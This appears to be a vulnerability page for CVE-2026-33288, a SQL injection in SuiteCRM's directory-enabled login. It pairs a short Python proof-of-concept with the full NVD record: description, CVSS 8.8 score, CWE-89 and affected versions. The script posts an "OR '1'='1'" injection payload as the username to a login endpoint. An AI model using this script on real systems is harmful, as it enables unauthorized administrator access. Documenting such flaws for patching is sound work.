CVE-2026-33288

import requests # Target URL of the vulnerable SuiteCRM instance target_url = "https://example-suitecrm.com/index.php" # The vulnerable parameter is the username in the authentication request # Attacker needs a valid low-privilege directory password payload = "admin' OR '1'='1' --" # Login data construction login_data = { "user_name": payload, "user_password": "valid_low_privilege_password", "module": "Users", "action": "Authenticate", "Login": "Login" } try: response = requests.post(target_url, data=login_data, verify=False) if response.status_code == 200 and "Welcome" in response.text: print("[+] Exploit successful! SQL Injection executed.") else: print("[-] Exploit failed or payload incorrect.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33288", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:18.470", "lastModified": "2026-03-23T16:56:51.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, a SQL Injection vulnerability exists in the SuiteCRM authentication mechanisms when directory support is enabled. The application fails to properly sanitize the user-supplied username before using it in a local database query. An attacker with valid, low-privilege directory credentials can exploit this to execute arbitrary SQL commands, leading to complete privilege escalation (e.g., logging in as the CRM Administrator). Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Prior a las versiones 7.15.1 y 8.9.3, existe una vulnerabilidad de inyección SQL en los mecanismos de autenticación de SuiteCRM cuando el soporte de directorio está habilitado. La aplicación no logra sanear correctamente el nombre de usuario proporcionado por el usuario antes de usarlo en una consulta de base de datos local. Un atacante con credenciales de directorio válidas y de bajo privilegio puede explotar esto para ejecutar comandos SQL arbitrarios, lo que lleva a una escalada de privilegios completa (por ejemplo, iniciar sesión como el Administrador de CRM). Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-7g39-m4fg-vrq7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}